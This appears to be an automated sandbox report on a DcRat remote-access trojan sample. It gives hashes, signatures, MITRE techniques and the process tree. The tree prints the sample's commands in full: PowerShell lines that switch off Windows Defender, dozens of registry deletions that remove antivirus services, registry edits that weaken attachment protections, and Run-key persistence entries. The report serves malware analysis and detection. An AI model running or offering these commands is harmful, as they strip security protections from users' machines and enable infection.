dcrat | 7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c

Analysis

max time kernel
119s
max time network
134s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
29-01-2023 21:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe
Size

3.5MB
MD5

6a31b356444d196e1b484bfac18eaf6e
SHA1

fedb55b24c134a0055f70f26c9964b1219780428
SHA256

7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c
SHA512

5e8aa46c3afe3f2f35ad3f5ab0bc20afa7a752f30f35f4330e70c8226150659215820f73c3167f03366e87f8bd7daa67a9cff834f3768cf9d701a0f9dd53d34e
SSDEEP

98304:Db+bYAfeoIgy8J98XN18VBRUYDk3ptKSW8:DqEAfK2ENyPI3bKV8

Score

10^/10

dcrat evasion infostealer persistence rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
behavioral1/memory/2012-124-0x0000000000820000-0x0000000000828000-memory.dmp	disable_win_def

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Disable-Windows-Defender.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Disable-Windows-Defender.exe

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/2352-203-0x0000000000B20000-0x0000000000B98000-memory.dmp	dcrat
\savesdll\brokersaves.exe	dcrat
behavioral1/memory/2260-282-0x0000000000890000-0x0000000000908000-memory.dmp	dcrat

Executes dropped EXE 13 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeDesktop.exeAAV (2).exeDisable-Windows-Defender.exeDCRatBuild.exeH6tchIl3Mk5re1vJkxJB.exebrokersaves.exeWMIADAP.exe

pid	process
572	7z.exe
1192	7z.exe
1644	7z.exe
1284	7z.exe
1568	7z.exe
736	7z.exe
1980	Desktop.exe
360	AAV (2).exe
2012	Disable-Windows-Defender.exe
1488	DCRatBuild.exe
1968	H6tchIl3Mk5re1vJkxJB.exe
2352	brokersaves.exe
2260	WMIADAP.exe

Loads dropped DLL 24 IoCs

Processes:

cmd.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeDesktop.exeAAV (2).execmd.execmd.exe

pid	process
1448	cmd.exe
572	7z.exe
1448	cmd.exe
1192	7z.exe
1448	cmd.exe
1644	7z.exe
1448	cmd.exe
1284	7z.exe
1448	cmd.exe
1568	7z.exe
1448	cmd.exe
736	7z.exe
1448	cmd.exe
1980	Desktop.exe
1980	Desktop.exe
1980	Desktop.exe
1980	Desktop.exe
360	AAV (2).exe
360	AAV (2).exe
1980	Desktop.exe
1980	Desktop.exe
1980	Desktop.exe
1640	cmd.exe
2304	cmd.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

brokersaves.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\brokersaves = "\"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\brokersaves.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\ProgramData\\Mozilla\\updates\\308046B0AF4A39CB\\conhost.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\savesdll\\WmiPrvSE.exe\""	brokersaves.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\WMIADAP = "\"C:\\Documents and Settings\\WMIADAP.exe\""	brokersaves.exe

Checks for any installed AV software in registry 1 TTPs 6 IoCs

Security Software Discovery

T1063

Processes:

powershell.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AntiVirService	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AVP18.0.0	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\McAPExe	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\McProxy	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\avast! Antivirus	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 12 IoCs

installer

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2108 schtasks.exe
2144 schtasks.exe
2192 schtasks.exe
2236 schtasks.exe

pid	process
2108	schtasks.exe
2144	schtasks.exe
2192	schtasks.exe
2236	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebrokersaves.exeWMIADAP.exe

pid	process
1764	powershell.exe
816	powershell.exe
268	powershell.exe
960	powershell.exe
1744	powershell.exe
1720	powershell.exe
944	powershell.exe
1080	powershell.exe
1576	powershell.exe
1056	powershell.exe
2352	brokersaves.exe
2260	WMIADAP.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebrokersaves.exeWMIADAP.exe

description	pid	process
Token: SeRestorePrivilege	572	7z.exe
Token: 35	572	7z.exe
Token: SeSecurityPrivilege	572	7z.exe
Token: SeSecurityPrivilege	572	7z.exe
Token: SeRestorePrivilege	1192	7z.exe
Token: 35	1192	7z.exe
Token: SeSecurityPrivilege	1192	7z.exe
Token: SeSecurityPrivilege	1192	7z.exe
Token: SeRestorePrivilege	1644	7z.exe
Token: 35	1644	7z.exe
Token: SeSecurityPrivilege	1644	7z.exe
Token: SeSecurityPrivilege	1644	7z.exe
Token: SeRestorePrivilege	1284	7z.exe
Token: 35	1284	7z.exe
Token: SeSecurityPrivilege	1284	7z.exe
Token: SeSecurityPrivilege	1284	7z.exe
Token: SeRestorePrivilege	1568	7z.exe
Token: 35	1568	7z.exe
Token: SeSecurityPrivilege	1568	7z.exe
Token: SeSecurityPrivilege	1568	7z.exe
Token: SeRestorePrivilege	736	7z.exe
Token: 35	736	7z.exe
Token: SeSecurityPrivilege	736	7z.exe
Token: SeSecurityPrivilege	736	7z.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	816	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2352	brokersaves.exe
Token: SeDebugPrivilege	2260	WMIADAP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.execmd.exeDesktop.exeAAV (2).execmd.exe

description	pid	process	target process
PID 1128 wrote to memory of 1448	1128	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 1128 wrote to memory of 1448	1128	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 1128 wrote to memory of 1448	1128	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 1128 wrote to memory of 1448	1128	7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe	cmd.exe
PID 1448 wrote to memory of 268	1448	cmd.exe	mode.com
PID 1448 wrote to memory of 268	1448	cmd.exe	mode.com
PID 1448 wrote to memory of 268	1448	cmd.exe	mode.com
PID 1448 wrote to memory of 268	1448	cmd.exe	mode.com
PID 1448 wrote to memory of 572	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 572	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 572	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 572	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1192	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1192	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1192	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1192	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1644	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1644	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1644	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1644	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1284	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1284	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1284	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1284	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1568	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1568	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1568	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1568	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 736	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 736	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 736	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 736	1448	cmd.exe	7z.exe
PID 1448 wrote to memory of 1976	1448	cmd.exe	attrib.exe
PID 1448 wrote to memory of 1976	1448	cmd.exe	attrib.exe
PID 1448 wrote to memory of 1976	1448	cmd.exe	attrib.exe
PID 1448 wrote to memory of 1976	1448	cmd.exe	attrib.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	Desktop.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	Desktop.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	Desktop.exe
PID 1448 wrote to memory of 1980	1448	cmd.exe	Desktop.exe
PID 1980 wrote to memory of 360	1980	Desktop.exe	AAV (2).exe
PID 1980 wrote to memory of 360	1980	Desktop.exe	AAV (2).exe
PID 1980 wrote to memory of 360	1980	Desktop.exe	AAV (2).exe
PID 1980 wrote to memory of 360	1980	Desktop.exe	AAV (2).exe
PID 360 wrote to memory of 2012	360	AAV (2).exe	Disable-Windows-Defender.exe
PID 360 wrote to memory of 2012	360	AAV (2).exe	Disable-Windows-Defender.exe
PID 360 wrote to memory of 2012	360	AAV (2).exe	Disable-Windows-Defender.exe
PID 360 wrote to memory of 2012	360	AAV (2).exe	Disable-Windows-Defender.exe
PID 360 wrote to memory of 768	360	AAV (2).exe	cmd.exe
PID 360 wrote to memory of 768	360	AAV (2).exe	cmd.exe
PID 360 wrote to memory of 768	360	AAV (2).exe	cmd.exe
PID 360 wrote to memory of 768	360	AAV (2).exe	cmd.exe
PID 1980 wrote to memory of 1488	1980	Desktop.exe	DCRatBuild.exe
PID 1980 wrote to memory of 1488	1980	Desktop.exe	DCRatBuild.exe
PID 1980 wrote to memory of 1488	1980	Desktop.exe	DCRatBuild.exe
PID 1980 wrote to memory of 1488	1980	Desktop.exe	DCRatBuild.exe
PID 768 wrote to memory of 1360	768	cmd.exe	reg.exe
PID 768 wrote to memory of 1360	768	cmd.exe	reg.exe
PID 768 wrote to memory of 1360	768	cmd.exe	reg.exe
PID 768 wrote to memory of 1360	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2028	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2028	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2028	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2028	768	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1976 attrib.exe

pid	process
1976	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe
"C:\Users\Admin\AppData\Local\Temp\7df2568c5082542afa6a357b95d9bb22ee7501498b6f97c8bafff26600c8b61c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1128

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.bat" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\SysWOW64\mode.com
mode 65,10
3⤵
PID:268

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e file.zip -p___________32504pwd8196pwd16820___________ -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_5.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_4.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_3.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1284

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_2.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_1.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:736

C:\Windows\SysWOW64\attrib.exe
attrib +H "Desktop.exe"
3⤵
- Views/modifies file attributes
PID:1976

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Desktop.exe
"Desktop.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1980

C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:360

C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
"C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe"
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:2012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
6⤵
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent Never
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\1337\antiav.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
6⤵
PID:1360

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
6⤵
PID:2028

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
6⤵
- Checks for any installed AV software in registry
PID:2004

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
6⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
6⤵
PID:1484

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
6⤵
PID:1176

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
6⤵
PID:752

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
6⤵
PID:788

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
6⤵
PID:824

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
6⤵
PID:900

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
6⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
6⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
6⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
6⤵
PID:816

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
6⤵
- Checks for any installed AV software in registry
PID:1792

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
6⤵
PID:1500

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
6⤵
PID:432

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
6⤵
PID:1436

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
6⤵
PID:1080

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
6⤵
PID:532

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
6⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
6⤵
- Checks for any installed AV software in registry
PID:1552

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
6⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
6⤵
PID:1964

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
6⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
6⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
6⤵
PID:268

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
6⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
6⤵
PID:616

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
6⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
6⤵
PID:816

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
6⤵
PID:1708

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
6⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
6⤵
- Checks for any installed AV software in registry
PID:1520

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
6⤵
- Checks for any installed AV software in registry
PID:1804

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
6⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
6⤵
PID:884

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
6⤵
PID:532

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
6⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
6⤵
PID:984

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
6⤵
PID:1964

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
6⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
6⤵
PID:664

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
6⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
6⤵
PID:432

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
6⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
6⤵
PID:360

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
6⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
6⤵
PID:2068

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
6⤵
PID:2136

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
6⤵
PID:2148

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
6⤵
PID:2160

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
6⤵
PID:2104

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
6⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
6⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
